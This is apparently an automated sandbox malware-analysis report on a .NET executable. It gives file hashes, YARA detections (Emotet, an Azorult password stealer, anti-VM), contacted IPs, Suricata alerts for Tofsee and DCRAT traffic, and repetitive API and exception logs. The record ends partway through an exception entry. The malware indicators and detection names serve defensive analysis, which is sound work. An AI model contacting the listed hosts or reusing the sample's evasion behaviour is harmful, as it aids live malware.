Summary | ZeroBOX

Ozgkdiw.exe

Emotet Suspicious_Script_Bin Generic Malware Hide_EXE .NET framework(MSIL) task schedule UPX Escalate priviledges Anti_VM ScreenShot PWS AntiDebug PE File OS Processor Check PE32 .NET EXE AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us July 4, 2023, 5:31 p.m. July 4, 2023, 5:35 p.m.
Size 4.2MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 2b7acf39186ebd5343bac84ba53dc078
SHA256 b8a7a98af1a8c447cd01719ad921f645bf56f293fb7efab345874dc6a04f597f
CRC32 B798AD18
ssdeep 24576:fhO2Dhr5WJkindZOFoq0uQzuSx/4VQwiWSV5mjRfROFewp7bAC2U9pxbmqmWAnuj:fhOiOkiHm0PzuSx/4VQwW
Yara
  • UPX_Zero - UPX packed file
  • Win32_Trojan_Emotet_2_Zero - Win32 Trojan Emotet
  • OS_Processor_Check_Zero - OS Processor Check
  • Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult
  • PE_Header_Zero - PE File Signature
  • anti_vm_detect - Possibly employs anti-virtualization techniques
  • Is_DotNET_EXE - (no description)
  • hide_executable_file - Hide executable file
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
pastebin.com 172.67.34.170
IP Address Status Action
104.20.67.143 Active Moloch
164.124.101.2 Active Moloch
5.161.143.111 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 104.20.67.143:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49172 -> 5.161.143.111:80 2034194 ET MALWARE DCRAT Activity (GET) A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.103:49171
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003812d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00381498
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00381498
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00381558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00880d58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00880f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00880f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00880fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x5e167cb
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca

exception.instruction_r: 39 09 e8 a0 4a a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c091
registers.esp: 88140868
registers.edi: 88140932
registers.eax: 0
registers.ebp: 88140940
registers.edx: 48036084
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e167cb
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca

exception.instruction_r: 39 09 e8 2d 4a a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c104
registers.esp: 88136468
registers.edi: 88140932
registers.eax: 0
registers.ebp: 88140940
registers.edx: 48036084
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e167ee
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca

exception.instruction_r: 39 09 e8 60 49 a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c1d1
registers.esp: 88140868
registers.edi: 88140932
registers.eax: 0
registers.ebp: 88140940
registers.edx: 48442484
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e167ee
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca

exception.instruction_r: 39 09 e8 ed 48 a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c244
registers.esp: 88136468
registers.edi: 88140932
registers.eax: 0
registers.ebp: 88140940
registers.edx: 48442484
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e16811
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca

exception.instruction_r: 39 09 e8 20 48 a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c311
registers.esp: 88140868
registers.edi: 88140932
registers.eax: 0
registers.ebp: 88140940
registers.edx: 48443308
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e16811
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca

exception.instruction_r: 39 09 e8 ad 47 a5 6b 89 45 bc 8b 55 bc b9 b0 af
